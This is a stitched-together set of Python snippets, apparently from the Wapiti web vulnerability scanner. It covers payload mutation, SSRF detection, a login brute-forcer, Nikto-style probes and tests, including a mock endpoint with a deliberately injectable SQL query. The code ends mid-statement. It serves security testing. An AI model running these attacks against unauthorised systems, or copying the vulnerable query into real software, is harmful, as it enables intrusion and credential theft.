async def test_whole_stuff(): # Test attacking all kind of parameter without crashing respx.route(host="perdu.com").mock(return_value=httpx.Response(200, text="Hello there")) persister = AsyncMock() all_requests = [] request = Request("http://perdu.com/") request.path_id = 1 all_requests.append(request) request = Request("http://perdu.com/?foo=bar") request.path_id = 2 all_requests.append(request) request = Request( "http://perdu.com/?foo=bar", post_params=[["a", "b"]], file_params=[["file", ("calendar.xml", "<xml>Hello there</xml", "application/xml")]] ) request.path_id = 3 all_requests.append(request) def get_path_by_id(request_id): for req in all_requests: if req.path_id == int(request_id): return req return None persister.get_path_by_id.side_effect = get_path_by_id crawler = AsyncCrawler("http://perdu.com/", timeout=1) options = {"timeout": 10, "level": 2} module = mod_ssrf(crawler, persister, options, Event()) module.verbose = 2 module.do_post = True respx.get("https://wapiti3.ovh/get_ssrf.php?session_id=" + module._session_id).mock( return_value=httpx.Response( 200, json={ "3": { "66696c65": [ { "date": "2019-08-17T16:52:41+00:00", "url": "https://wapiti3.ovh/ssrf_data/yolo/3/66696c65/31337-0-192.168.2.1.txt", "ip": "192.168.2.1", "method": "GET" } ] } } ) ) for request in all_requests: await module.attack(request) assert not persister.add_payload.call_count # We must trigger finish() normally called by wapiti.py await module.finish() assert persister.add_payload.call_count assert persister.add_payload.call_args_list[0][1]["module"] == "ssrf" assert persister.add_payload.call_args_list[0][1]["category"] == _("Server Side Request Forgery") assert persister.add_payload.call_args_list[0][1]["parameter"] == "file" assert persister.add_payload.call_args_list[0][1]["request"].file_params == [ ['file', ('http://external.url/page', '<xml>Hello there</xml', 'application/xml')] ] await crawler.close()
async def attack(self, request: Request): self.finished = True request_to_root = Request(request.url) try: with open(os.path.join(self.user_config_dir, self.WAPP_DB)) as wapp_db_file: json.load(wapp_db_file) except IOError: print(_("Problem with local wapp database.")) print(_("Downloading from the web...")) await self.update() try: application_data = ApplicationData(os.path.join(self.user_config_dir, self.WAPP_DB)) except FileNotFoundError as exception: print(exception) print(_("Try using --store-session option, or update apps.json using --update option.")) return except ApplicationDataException as exception: print(exception) return try: response = await self.crawler.async_send(request_to_root, follow_redirects=True) except RequestError: self.network_errors += 1 return wappalyzer = Wappalyzer(application_data, response) detected_applications = wappalyzer.detect_with_versions_and_categories() if len(detected_applications) > 0: self.log_blue("---") for application_name in sorted(detected_applications, key=lambda x: x.lower()): versions = detected_applications[application_name]["versions"] categories = detected_applications[application_name]["categories"] self.log_blue( MSG_TECHNO_VERSIONED, application_name, versions ) await self.add_addition( category=TECHNO_DETECTED, request=request_to_root, info=json.dumps(detected_applications[application_name]) ) if versions: if "Web servers" in categories: await self.add_vuln_info( category=WEB_SERVER_VERSIONED, request=request_to_root, info=json.dumps(detected_applications[application_name]) ) else: await self.add_vuln_info( category=WEB_APP_VERSIONED, request=request_to_root, info=json.dumps(detected_applications[application_name]) )
def mutate(self, request: Request): get_params = request.get_params post_params = request.post_params file_params = request.file_params referer = request.referer # estimation = self.estimate_requests_count(request) # # if self._attacks_per_url_pattern[request.hash_params] + estimation > self._max_queries_per_pattern: # # Otherwise (pattern already attacked), make sure we don't exceed maximum allowed # return # # self._attacks_per_url_pattern[request.hash_params] += estimation for params_list in [get_params, post_params, file_params]: if params_list is get_params and not self._mutate_get: continue if params_list is post_params and not self._mutate_post: continue if params_list is file_params and not self._mutate_file: continue for i in range(len(params_list)): param_name = quote(params_list[i][0]) if self._skip_list and param_name in self._skip_list: continue if self._parameters and param_name not in self._parameters: continue saved_value = params_list[i][1] if saved_value is None: saved_value = "" if params_list is file_params: params_list[i][1] = ["__PAYLOAD__", params_list[i][1][1]] else: params_list[i][1] = "__PAYLOAD__" attack_pattern = Request(request.path, method=request.method, get_params=get_params, post_params=post_params, file_params=file_params) if hash(attack_pattern) not in self._attack_hashes: self._attack_hashes.add(hash(attack_pattern)) for payload, original_flags in self.iter_payloads(): if ("[FILE_NAME]" in payload or "[FILE_NOEXT]" in payload) and not request.file_name: continue # no quoting: send() will do it for us payload = payload.replace("[FILE_NAME]", request.file_name) payload = payload.replace( "[FILE_NOEXT]", splitext(request.file_name)[0]) if isinstance(request.path_id, int): payload = payload.replace("[PATH_ID]", str(request.path_id)) payload = payload.replace( "[PARAM_AS_HEX]", hexlify( param_name.encode("utf-8", errors="replace")).decode()) if params_list is file_params: if "[EXTVALUE]" in payload: if "." not in saved_value[0][:-1]: # Nothing that looks like an extension, skip the payload continue payload = payload.replace( "[EXTVALUE]", saved_value[0].rsplit(".", 1)[-1]) payload = payload.replace("[VALUE]", saved_value[0]) payload = payload.replace( "[DIRVALUE]", saved_value[0].rsplit('/', 1)[0]) params_list[i][1][0] = payload method = PayloadType.file else: if "[EXTVALUE]" in payload: if "." not in saved_value[:-1]: # Nothing that looks like an extension, skip the payload continue payload = payload.replace( "[EXTVALUE]", saved_value.rsplit(".", 1)[-1]) payload = payload.replace("[VALUE]", saved_value) payload = payload.replace( "[DIRVALUE]", saved_value.rsplit('/', 1)[0]) params_list[i][1] = payload if params_list is get_params: method = PayloadType.get else: method = PayloadType.post evil_req = Request(request.path, method=request.method, get_params=get_params, post_params=post_params, file_params=file_params, referer=referer, link_depth=request.link_depth) # Flags from iter_payloads should be considered as mutable (even if it's ot the case) # so let's copy them just to be sure we don't mess with them. yield evil_req, param_name, payload, original_flags.with_method( method) params_list[i][1] = saved_value if not get_params and request.method == "GET" and self._qs_inject: attack_pattern = Request("{}?__PAYLOAD__".format(request.path), method=request.method, referer=referer, link_depth=request.link_depth) if hash(attack_pattern) not in self._attack_hashes: self._attack_hashes.add(hash(attack_pattern)) for payload, original_flags in self.iter_payloads(): # Ignore payloads reusing existing parameter values if "[VALUE]" in payload: continue if "[DIRVALUE]" in payload: continue if ("[FILE_NAME]" in payload or "[FILE_NOEXT]" in payload) and not request.file_name: continue payload = payload.replace("[FILE_NAME]", request.file_name) payload = payload.replace("[FILE_NOEXT]", splitext(request.file_name)[0]) if isinstance(request.path_id, int): payload = payload.replace("[PATH_ID]", str(request.path_id)) payload = payload.replace( "[PARAM_AS_HEX]", hexlify(b"QUERY_STRING").decode()) evil_req = Request("{}?{}".format(request.path, quote(payload)), method=request.method, referer=referer, link_depth=request.link_depth) yield evil_req, "QUERY_STRING", payload, original_flags.with_method( PayloadType.get)
def finish(self): endpoint_url = "{}get_ssrf.php?id={}".format(self.internal_endpoint, self._session_id) print( _("[*] Asking endpoint URL {} for results, please wait...").format( endpoint_url)) sleep(2) # A la fin des attaques on questionne le endpoint pour savoir s'il a été contacté endpoint_request = Request(endpoint_url) try: response = self.crawler.send(endpoint_request) except RequestException: print( _("[!] Unable to request endpoint URL '{}'").format( self.internal_endpoint)) else: data = response.json if isinstance(data, dict): for request_id in data: original_request = self.persister.get_path_by_id( request_id) if original_request is None: raise ValueError( "Could not find the original request with that ID") page = original_request.path for hex_param in data[request_id]: parameter = unhexlify(hex_param).decode("utf-8") for infos in data[request_id][hex_param]: request_url = infos["url"] # Date in ISO format request_date = infos["date"] request_ip = infos["ip"] request_method = infos["method"] # request_size = infos["size"] if parameter == "QUERY_STRING": vuln_message = Vulnerability.MSG_QS_INJECT.format( self.MSG_VULN, page) else: vuln_message = _( "{0} via injection in the parameter {1}.\n" "The target performed an outgoing HTTP {2} request at {3} with IP {4}.\n" "Full request can be seen at {5}").format( self.MSG_VULN, parameter, request_method, request_date, request_ip, request_url) mutator = Mutator( methods="G" if original_request.method == "GET" else "PF", payloads=[("http://external.url/page", set())], qs_inject=self.must_attack_query_string, parameters=[parameter], skip=self.options.get("skipped_parameters")) mutated_request, __, __, __ = next( mutator.mutate(original_request)) self.add_vuln(request_id=original_request.path_id, category=Vulnerability.SSRF, level=Vulnerability.HIGH_LEVEL, request=mutated_request, info=vuln_message, parameter=parameter) self.log_red("---") self.log_red( Vulnerability.MSG_QS_INJECT if parameter == "QUERY_STRING" else Vulnerability.MSG_PARAM_INJECT, self.MSG_VULN, page, parameter) self.log_red(Vulnerability.MSG_EVIL_REQUEST) self.log_red(mutated_request.http_repr()) self.log_red("---")
async def attack(self, request: Request): try: page = await self.crawler.async_get(Request(request.referer), follow_redirects=True) except RequestError: self.network_errors += 1 return login_form, username_field_idx, password_field_idx = page.find_login_form( ) if not login_form: return try: failure_text = await self.test_credentials(login_form, username_field_idx, password_field_idx, "invalid", "invalid") if self.check_success_auth(failure_text): # Ignore this case as it raises false positives return except RequestError: self.network_errors += 1 return for username, password in product(self.get_usernames(), self.get_passwords()): if self._stop_event.is_set(): break try: response = await self.test_credentials(login_form, username_field_idx, password_field_idx, username, password) except RequestError: self.network_errors += 1 continue if self.check_success_auth(response) and failure_text != response: vuln_message = _( "Credentials found for URL {} : {} / {}").format( request.referer, username, password) # Recreate the request that succeed in order to print and store it post_params = login_form.post_params get_params = login_form.get_params if login_form.method == "POST": post_params[username_field_idx][1] = username post_params[password_field_idx][1] = password else: get_params[username_field_idx][1] = username get_params[password_field_idx][1] = password evil_request = Request(path=login_form.url, method=login_form.method, post_params=post_params, get_params=get_params, referer=login_form.referer, link_depth=login_form.link_depth) await self.add_vuln_low(request_id=request.path_id, category=NAME, request=evil_request, info=vuln_message) self.log_red("---") self.log_red(vuln_message) self.log_red(Messages.MSG_EVIL_REQUEST) self.log_red(evil_request.http_repr()) self.log_red("---") break
async def test_blind_detection_parenthesis(): with NamedTemporaryFile() as database_fd: conn = sqlite3.connect(database_fd.name) cursor = conn.cursor() cursor.execute( "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)" ) conn.commit() cursor.execute( "INSERT INTO users (id, username, password) VALUES (1, \"admin\", \"123456\")" ) conn.commit() cursor.close() conn.close() def process(http_request): try: username = parse_qs(urlparse(str( http_request.url)).query)["username"][0] except (IndexError, KeyError): return httpx.Response(200, text="Unknown user") else: conn = sqlite3.connect(database_fd.name) cursor = conn.cursor() try: # Will you spot the SQLi vulnerability? :D cursor.execute( "SELECT id FROM users WHERE username = '******'".format( username)) row = cursor.fetchone() except sqlite3.OperationalError: cursor.close() conn.close() return httpx.Response(200, text="Unknown user") else: cursor.close() conn.close() if row: return httpx.Response( 200, text="Welcome, your user ID is {}".format(row[0])) else: return httpx.Response(200, text="Unknown user") respx.get(url__regex=r"http://perdu\.com/\?username=.*").mock( side_effect=process) persister = AsyncMock() request = Request("http://perdu.com/?username=admin") request.path_id = 1 crawler = AsyncCrawler("http://perdu.com/", timeout=1) options = {"timeout": 10, "level": 1} module = mod_sql(crawler, persister, options, Event()) module.verbose = 2 module.do_post = True await module.attack(request) assert persister.add_payload.call_count # This is the same test as the previous blind except we have to put single quotes assert respx.calls.call_count == 8 await crawler.close()
def test_theme(): responses.add( responses.GET, url="http://perdu.com/", body= "<html><head><title>Vous Etes Perdu ?</title></head><body><h1>Perdu sur l'Internet ?</h1> \ <h2>Pas de panique, on va wordpress vous aider</h2> \ Wordpress wordpress WordPress\ <strong><pre> * <----- vous êtes ici</pre></strong></body></html>" ) #Response for versioned theme responses.add( responses.GET, url="http://perdu.com/wp-content/themes/twentynineteen/readme.txt", body= "<html><head><title>Vous Etes Perdu ?</title></head><body><h1>Perdu sur l'Internet ?</h1> \ <h2>Pas de panique, on va wordpress vous aider</h2> \ Wordpress wordpress WordPress\ Stable tag: 1.9 \ <strong><pre> * <----- vous êtes ici</pre></strong></body></html>" ) #Response for theme detected without version (403 forbiden response) responses.add( responses.GET, url="http://perdu.com/wp-content/themes/seedlet/readme.txt", body= "<html><head><title>Vous Etes Perdu ?</title></head><body><h1>Perdu sur l'Internet ?</h1> \ <h2>Pas de panique, on va wordpress vous aider</h2> \ Wordpress wordpress WordPress\ Stable tag: 5.4 \ <strong><pre> * <----- vous êtes ici</pre></strong></body></html>", status=403) #Response for bad format readme.txt of theme responses.add( responses.GET, url="http://perdu.com/wp-content/themes/customify/readme.txt", body= "<html><head><title>Vous Etes Perdu ?</title></head><body><h1>Perdu sur l'Internet ?</h1> \ <h2>Pas de panique, on va wordpress vous aider</h2> \ Wordpress wordpress WordPress\ Version Tested : 3.2 \ <strong><pre> * <----- vous êtes ici</pre></strong></body></html>" ) responses.add( responses.GET, url=re.compile(r"http://perdu.com/wp-content/plugins/.*?/readme.txt"), status=404) responses.add( responses.GET, url=re.compile(r"http://perdu.com/wp-content/themes/.*?/readme.txt"), status=404) persister = FakePersister() request = Request("http://perdu.com") request.path_id = 1 crawler = Crawler("http://perdu.com") options = {"timeout": 10, "level": 2} logger = Mock() module = mod_wp_enum(crawler, persister, logger, options) module.verbose = 2 module.attack(request) assert persister.additionals assert persister.additionals[ 0] == '{"name": "twentynineteen", "versions": ["1.9"], "categories": ["WordPress themes"]}' assert persister.additionals[ 1] == '{"name": "seedlet", "versions": [""], "categories": ["WordPress themes"]}' assert persister.additionals[ 2] == '{"name": "customify", "versions": [""], "categories": ["WordPress themes"]}'
async def test_resume_crawling(): stop_event = Event() def process(http_request): try: page = int( parse_qs(urlparse(str(http_request.url)).query)["page"][0]) except (IndexError, KeyError, ValueError): return httpx.Response(200, text="Invalid value") if page == 10: stop_event.set() if page > 20: return httpx.Response(200, text="") body = "<html><body>" body += "<a href='http://perdu.com/?page={0}'>{0}</a>\n".format(page + 1) body += "<a href='http://perdu.com/?page={0}'>{0}</a>\n".format(page + 2) return httpx.Response(200, text=body) respx.get(url__regex=r"http://perdu\.com/$").mock( return_value=httpx.Response( 200, text="<html><body><a href='http://perdu.com/?page=0'>0</a>")) respx.get(url__regex=r"http://perdu\.com/\?page=\d+").mock( side_effect=process) # Mock HTTP 404 behavior check respx.get(url__regex=r"http://perdu\.com/z.*\.html$").mock( return_value=httpx.Response(404)) temp_obj = TemporaryDirectory() wapiti = Wapiti(Request("http://perdu.com/"), session_dir=temp_obj.name) await wapiti.init_persister() await wapiti.load_scan_state() await wapiti.browse(stop_event, parallelism=1) await wapiti.save_scan_state() remaining_requests = set( [request async for request in wapiti.persister.get_to_browse()]) # Got root url + pages 0 to 9 all_requests = set( [request async for request in wapiti.persister.get_links()]) remaining_urls = { request.url for request in remaining_requests - all_requests } # Page 10 stops the crawling but gave links to pages 11 and 12 so they will be the remaining urls assert remaining_urls == { "http://perdu.com/?page=11", "http://perdu.com/?page=12" } await wapiti.crawler.close() wapiti = Wapiti(Request("http://perdu.com/"), session_dir=temp_obj.name) await wapiti.init_persister() await wapiti.load_scan_state() await wapiti.browse(stop_event) await wapiti.save_scan_state() remaining_requests = set( [request async for request in wapiti.persister.get_to_browse()]) all_requests = set( [request async for request in wapiti.persister.get_links()]) # We stop giving new links at page > 20 but page 20 will give urls for 21 and 22 # so we have 24 paginated pages (23 from 0 to 22) + root url here assert len(all_requests) == 24 # We are done as we scanned all the pages assert not remaining_requests - all_requests rmtree(temp_obj.name) await wapiti.crawler.close()
def getcookie_main(): parser = argparse.ArgumentParser(description="Wapiti-getcookie: An utility to grab cookies from a webpage") parser.add_argument( '-u', '--url', help='First page to fetch for cookies', required=True ) parser.add_argument( '-c', '--cookie', help='Cookie file in Wapiti JSON format where cookies will be stored', required=True ) parser.add_argument( '-p', '--proxy', help='Address of the proxy server to use' ) parser.add_argument( "--tor", action="store_true", help=_("Use Tor listener (127.0.0.1:9050)") ) parser.add_argument( "-a", "--auth-cred", dest="credentials", default=argparse.SUPPRESS, help=_("Set HTTP authentication credentials"), metavar="CREDENTIALS" ) parser.add_argument( "--auth-type", default=argparse.SUPPRESS, help=_("Set the authentication type to use"), choices=["basic", "digest", "kerberos", "ntlm"] ) parser.add_argument( '-d', '--data', help='Data to send to the form with POST' ) parser.add_argument( "-A", "--user-agent", default=argparse.SUPPRESS, help=_("Set a custom user-agent to use for every requests"), metavar="AGENT", dest="user_agent" ) parser.add_argument( "-H", "--header", action="append", default=[], help=_("Set a custom header to use for every requests"), metavar="HEADER", dest="headers" ) args = parser.parse_args() parts = urlparse(args.url) if not parts.scheme or not parts.netloc or not parts.path: print(_("Invalid base URL was specified, please give a complete URL with protocol scheme" " and slash after the domain name.")) exit() server = parts.netloc base = urlunparse((parts.scheme, parts.netloc, parts.path, '', '', '')) crawler = Crawler(base) if args.proxy: proxy_parts = urlparse(args.proxy) if proxy_parts.scheme and proxy_parts.netloc: if proxy_parts.scheme.lower() in ("http", "https", "socks"): crawler.set_proxy(args.proxy) if args.tor: crawler.set_proxy("socks://127.0.0.1:9050/") if "user_agent" in args: crawler.add_custom_header("user-agent", args.user_agent) if "credentials" in args: if "%" in args.credentials: crawler.credentials = args.credentials.split("%", 1) else: raise InvalidOptionValue("-a", args.credentials) if "auth_type" in args: crawler.auth_method = args.auth_type for custom_header in args.headers: if ":" in custom_header: hdr_name, hdr_value = custom_header.split(":", 1) crawler.add_custom_header(hdr_name.strip(), hdr_value.strip()) # Open or create the cookie file and delete previous cookies from this server json_cookie = jsoncookie.JsonCookie() json_cookie.open(args.cookie) json_cookie.delete(server) page = crawler.get(Request(args.url), follow_redirects=True) # A first crawl is sometimes necessary, so let's fetch the webpage json_cookie.addcookies(crawler.session_cookies) if not args.data: # Not data specified, try interactive mode by fetching forms forms = [] for i, form in enumerate(page.iter_forms(autofill=False)): if i == 0: print('') print(_("Choose the form you want to use or enter 'q' to leave :")) print("{0}) {1}".format(i, form)) forms.append(form) valid_choice_done = False if forms: nchoice = -1 print('') while not valid_choice_done: choice = input(_("Enter a number : ")) if choice.isdigit(): nchoice = int(choice) if len(forms) > nchoice >= 0: valid_choice_done = True elif choice == 'q': break if valid_choice_done: form = forms[nchoice] print('') print(_("Please enter values for the following form: ")) print(_("url = {0}").format(form.url)) post_params = form.post_params for i, post_param_tuple in enumerate(post_params): field, value = post_param_tuple if value: new_value = input(field + " (" + value + ") : ") else: new_value = input("{}: ".format(field)) post_params[i] = [field, new_value] request = Request(form.url, post_params=post_params) crawler.send(request, follow_redirects=True) json_cookie.addcookies(crawler.session_cookies) else: request = Request(args.url, post_params=args.data) crawler.send(request, follow_redirects=True) json_cookie.addcookies(crawler.session_cookies) json_cookie.dump() json_cookie.close()
def mutate(self, request: Request): get_params = request.get_params post_params = request.post_params file_params = request.file_params referer = request.referer # estimation = self.estimate_requests_count(request) # # if self._attacks_per_url_pattern[request.hash_params] + estimation > self._max_queries_per_pattern: # # Otherwise (pattern already attacked), make sure we don't exceed maximum allowed # return # # self._attacks_per_url_pattern[request.hash_params] += estimation for params_list in [get_params, post_params, file_params]: for i in range(len(params_list)): param_name = quote(params_list[i][0]) if self._skip_list and param_name in self._skip_list: continue if self._parameters and param_name not in self._parameters: continue saved_value = params_list[i][1] if saved_value is None: saved_value = "" if params_list is file_params: params_list[i][1] = ["__PAYLOAD__", params_list[i][1][1]] else: params_list[i][1] = "__PAYLOAD__" attack_pattern = Request(request.path, method=request.method, get_params=get_params, post_params=post_params, file_params=file_params) if hash(attack_pattern) not in self._attack_hashes: self._attack_hashes.add(hash(attack_pattern)) for payload, original_flags in self.iter_payloads(): # no quoting: send() will do it for us payload = payload.replace("[FILE_NAME]", request.file_name) payload = payload.replace( "[FILE_NOEXT]", splitext(request.file_name)[0]) # Flags from iter_payloads should be considered as mutable (even if it's ot the case) # so let's copy them just to be sure we don't mess with them. flags = set(original_flags) if params_list is file_params: payload = payload.replace("[VALUE]", saved_value[0]) payload = payload.replace( "[DIRVALUE]", saved_value[0].rsplit('/', 1)[0]) params_list[i][1][0] = payload flags.add(PayloadType.file) else: payload = payload.replace("[VALUE]", saved_value) payload = payload.replace( "[DIRVALUE]", saved_value.rsplit('/', 1)[0]) params_list[i][1] = payload if params_list is get_params: flags.add(PayloadType.get) else: flags.add(PayloadType.post) evil_req = Request(request.path, method=request.method, get_params=get_params, post_params=post_params, file_params=file_params, referer=referer, link_depth=request.link_depth) yield evil_req, param_name, payload, flags params_list[i][1] = saved_value if not get_params and request.method == "GET" and self._qs_inject: attack_pattern = Request("{}?__PAYLOAD__".format(request.path), method=request.method, referer=referer, link_depth=request.link_depth) if hash(attack_pattern) not in self._attack_hashes: self._attack_hashes.add(hash(attack_pattern)) for payload, original_flags in self.iter_payloads(): # Ignore payloads reusing existing parameter values if "[VALUE]" in payload: continue if "[DIRVALUE]" in payload: continue payload = payload.replace("[FILE_NAME]", request.file_name) payload = payload.replace("[FILE_NOEXT]", splitext(request.file_name)[0]) flags = set(original_flags) evil_req = Request("{}?{}".format(request.path, quote(payload)), method=request.method, referer=referer, link_depth=request.link_depth) flags.add(PayloadType.get) yield evil_req, "QUERY_STRING", flags
def test_whole_stuff(): # Test attacking all kind of parameter without crashing responses.add( responses.GET, url="http://perdu.com/", body="Hello there" ) persister = FakePersister() request = Request("http://perdu.com/") request.path_id = 1 persister.requests.append(request) request = Request("http://perdu.com/?foo=bar") request.path_id = 2 persister.requests.append(request) request = Request( "http://perdu.com/?foo=bar", post_params=[["a", "b"]], file_params=[["file", ["calendar.xml", "<xml>Hello there</xml"]]] ) request.path_id = 3 persister.requests.append(request) crawler = Crawler("http://perdu.com/", timeout=1) options = {"timeout": 10, "level": 2} logger = Mock() module = mod_ssrf(crawler, persister, logger, options) module.verbose = 2 module.do_post = True responses.add( responses.GET, url="https://wapiti3.ovh/get_ssrf.php?id=" + module._session_id, json={ "3": { "66696c65": [ { "date": "2019-08-17T16:52:41+00:00", "url": "https://wapiti3.ovh/ssrf_data/yolo/3/66696c65/31337-0-192.168.2.1.txt", "ip": "192.168.2.1", "method": "GET" } ] } } ) for request in persister.requests: module.attack(request) assert not persister.vulnerabilities # We must trigger finish(à normally called by wapiti.py module.finish() assert persister.vulnerabilities assert persister.vulnerabilities[0][0] == "file" file_params = persister.vulnerabilities[0][1].file_params assert file_params[0][1][0] == "http://external.url/page"
def test_mutations(): req = Request("http://perdu.com/page.php", method="POST", get_params=[["p", "login.php"]], post_params=[["user", "admin"], ["password", "letmein"]], file_params=[["file", ("pix.gif", "GIF89a", "image/gif")]]) mutator = Mutator(payloads=[("INJECT", Flags())]) count = 0 for __ in mutator.mutate(req): count += 1 assert count == 4 mutator = Mutator(payloads=[("PAYLOAD_1", Flags()), ("PAYLOAD_2", Flags()), ("PAYLOAD_3", Flags())]) count = 0 for __ in mutator.mutate(req): count += 1 assert count == 12 mutator = Mutator(methods="G", payloads=[("PAYLOAD_1", Flags()), ("PAYLOAD_2", Flags()), ("PAYLOAD_3", Flags())]) count = 0 for __ in mutator.mutate(req): count += 1 assert count == 3 mutator = Mutator(methods="P", payloads=[("PAYLOAD_1", Flags()), ("PAYLOAD_2", Flags()), ("PAYLOAD_3", Flags())]) count = 0 for __ in mutator.mutate(req): count += 1 assert count == 6 mutator = Mutator(methods="PF", payloads=[("PAYLOAD_1", Flags()), ("PAYLOAD_2", Flags()), ("PAYLOAD_3", Flags())]) count = 0 for __ in mutator.mutate(req): count += 1 assert count == 9 mutator = Mutator(payloads=[("PAYLOAD_1", Flags()), ("PAYLOAD_2", Flags()), ("PAYLOAD_3", Flags())], parameters=["user", "file"]) count = 0 for __ in mutator.mutate(req): count += 1 assert count == 6 mutator = Mutator(payloads=[("PAYLOAD_1", Flags()), ("PAYLOAD_2", Flags()), ("PAYLOAD_3", Flags())], skip={"p"}) count = 0 for __, __, __, __ in mutator.mutate(req): count += 1 assert count == 9 # JSESSIONID is marked as annoying parameter req2 = Request("http://perdu.com/page.php", method="POST", get_params=[["JSESSIONID", "deadbeef"]], post_params=[["user", "admin"], ["password", "letmein"]], file_params=[["file", ("pix.gif", "GIF89a", "image/gif")]]) mutator = Mutator(payloads=[("INJECT", Flags())]) count = 0 for __ in mutator.mutate(req2): count += 1 assert count == 3 # Inject into query string. Will only work if method is GET without any parameter req3 = Request("http://perdu.com/page.php") mutator = Mutator(payloads=[("PAYLOAD_1", Flags()), ("PAYLOAD_2", Flags())], qs_inject=True) count = 0 for __, __, __, __ in mutator.mutate(req3): count += 1 assert count == 2
def test_blind_detection_parenthesis(): with NamedTemporaryFile() as database_fd: conn = sqlite3.connect(database_fd.name) cursor = conn.cursor() cursor.execute( "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)" ) conn.commit() cursor.execute( "INSERT INTO users (id, username, password) VALUES (1, \"admin\", \"123456\")" ) conn.commit() cursor.close() conn.close() def process(http_request): try: username = parse_qs(urlparse( http_request.url).query)["username"][0] except (IndexError, KeyError): return 200, {}, "Unknown user" else: conn = sqlite3.connect(database_fd.name) cursor = conn.cursor() try: # Will you spot the SQLi vulnerability? :D cursor.execute( "SELECT id FROM users WHERE username = '******'".format( username)) row = cursor.fetchone() except sqlite3.OperationalError: cursor.close() conn.close() return 200, {}, "Unknown user" else: cursor.close() conn.close() if row: return 200, {}, "Welcome, your user ID is {}".format( row[0]) else: return 200, {}, "Unknown user" responses.add_callback(responses.GET, re.compile(r"http://perdu.com/\?username=.*"), callback=process) persister = FakePersister() request = Request("http://perdu.com/?username=admin") request.path_id = 1 crawler = Crawler("http://perdu.com/", timeout=1) options = {"timeout": 10, "level": 1} logger = Mock() module = mod_sql(crawler, persister, logger, options) module.verbose = 2 module.do_post = True module.attack(request) assert persister.vulnerabilities # This is the same test as the previous blind except we have to put single quotes assert len(responses.calls) == 8
async def attack(self, request: Request): try: with open(os.path.join(self.user_config_dir, self.NIKTO_DB)) as nikto_db_file: reader = csv.reader(nikto_db_file) self.nikto_db = [ line for line in reader if line != [] and line[0].isdigit() ] except IOError: print(_("Problem with local nikto database.")) print(_("Downloading from the web...")) await self.update() self.finished = True junk_string = "w" + "".join([ random.choice("0123456789abcdefghjijklmnopqrstuvwxyz") for __ in range(0, 5000) ]) urls = self.persister.get_links( attack_module=self.name) if self.do_get else [] server = next(urls).hostname for line in self.nikto_db: if self._stop_event.is_set(): break match = match_or = match_and = False fail = fail_or = False osv_id = line[1] path = line[3] method = line[4] vuln_desc = line[10] post_data = line[11] path = path.replace("@CGIDIRS", "/cgi-bin/") path = path.replace("@ADMIN", "/admin/") path = path.replace("@NUKE", "/modules/") path = path.replace("@PHPMYADMIN", "/phpMyAdmin/") path = path.replace("@POSTNUKE", "/postnuke/") path = re.sub(r"JUNK\((\d+)\)", lambda x: junk_string[:int(x.group(1))], path) if path[0] == "@": continue if not path.startswith("/"): path = "/" + path try: url = "http://" + server + path except UnicodeDecodeError: continue if method == "GET": evil_request = Request(url) elif method == "POST": evil_request = Request(url, post_params=post_data, method=method) else: evil_request = Request(url, post_params=post_data, method=method) if self.verbose == 2: if method == "GET": print("[¨] {0}".format(evil_request.url)) else: print("[¨] {0}".format(evil_request.http_repr())) try: response = await self.crawler.async_send(evil_request) except RequestError: self.network_errors += 1 continue except ValueError: # ValueError raised by urllib3 (Method cannot contain non-token characters), we don't want to raise continue page = response.content code = response.status raw = " ".join([x + ": " + y for x, y in response.headers.items()]) raw += page # First condition (match) if len(line[5]) == 3 and line[5].isdigit(): if code == int(line[5]): match = True else: if line[5] in raw: match = True # Second condition (or) if line[6] != "": if len(line[6]) == 3 and line[6].isdigit(): if code == int(line[6]): match_or = True else: if line[6] in raw: match_or = True # Third condition (and) if line[7] != "": if len(line[7]) == 3 and line[7].isdigit(): if code == int(line[7]): match_and = True else: if line[7] in raw: match_and = True else: match_and = True # Fourth condition (fail) if line[8] != "": if len(line[8]) == 3 and line[8].isdigit(): if code == int(line[8]): fail = True else: if line[8] in raw: fail = True # Fifth condition (or) if line[9] != "": if len(line[9]) == 3 and line[9].isdigit(): if code == int(line[9]): fail_or = True else: if line[9] in raw: fail_or = True if ((match or match_or) and match_and) and not (fail or fail_or): self.log_red("---") self.log_red(vuln_desc) self.log_red(url) refs = [] if osv_id != "0": refs.append("https://vulners.com/osvdb/OSVDB:" + osv_id) # CERT cert_advisory = re.search("(CA-[0-9]{4}-[0-9]{2})", vuln_desc) if cert_advisory is not None: refs.append("http://www.cert.org/advisories/" + cert_advisory.group(0) + ".html") # SecurityFocus securityfocus_bid = re.search("BID-([0-9]{4})", vuln_desc) if securityfocus_bid is not None: refs.append("http://www.securityfocus.com/bid/" + securityfocus_bid.group(1)) # Mitre.org mitre_cve = re.search("((CVE|CAN)-[0-9]{4}-[0-9]{4,})", vuln_desc) if mitre_cve is not None: refs.append( "http://cve.mitre.org/cgi-bin/cvename.cgi?name=" + mitre_cve.group(0)) # CERT Incidents cert_incident = re.search("(IN-[0-9]{4}-[0-9]{2})", vuln_desc) if cert_incident is not None: refs.append("http://www.cert.org/incident_notes/" + cert_incident.group(0) + ".html") # Microsoft Technet ms_bulletin = re.search("(MS[0-9]{2}-[0-9]{3})", vuln_desc) if ms_bulletin is not None: refs.append( "http://www.microsoft.com/technet/security/bulletin/" + ms_bulletin.group(0) + ".asp") info = vuln_desc if refs: self.log_red(_("References:")) self.log_red(" {0}".format("\n ".join(refs))) info += "\n" + _("References:") + "\n" info += "\n".join(refs) self.log_red("---") self.add_vuln(category=NAME, level=HIGH_LEVEL, request=evil_request, info=info)
def attack(self): """Launch the attacks based on the preferences set by the command line""" self._init_attacks() for attack_module in self.attacks: start = datetime.utcnow() if attack_module.do_get is False and attack_module.do_post is False: continue print('') if attack_module.require: attack_name_list = [attack.name for attack in self.attacks if attack.name in attack_module.require and (attack.do_get or attack.do_post)] if attack_module.require != attack_name_list: print(_("[!] Missing dependencies for module {0}:").format(attack_module.name)) print(" {0}".format(",".join([attack for attack in attack_module.require if attack not in attack_name_list]))) continue attack_module.load_require( [attack for attack in self.attacks if attack.name in attack_module.require] ) attack_module.log_green(_("[*] Launching module {0}"), attack_module.name) already_attacked = self.persister.count_attacked(attack_module.name) if already_attacked: attack_module.log_green( _("[*] {0} pages were previously attacked and will be skipped"), already_attacked ) resources_to_attack = [] if attack_module.do_get: resources_to_attack.append(self.persister.get_links(attack_module=attack_module.name)) if attack_module.do_post: resources_to_attack.append(self.persister.get_forms(attack_module=attack_module.name)) generator = chain.from_iterable(resources_to_attack) answer = "0" while True: try: original_request = next(generator) if attack_module.must_attack(original_request): if self.verbose 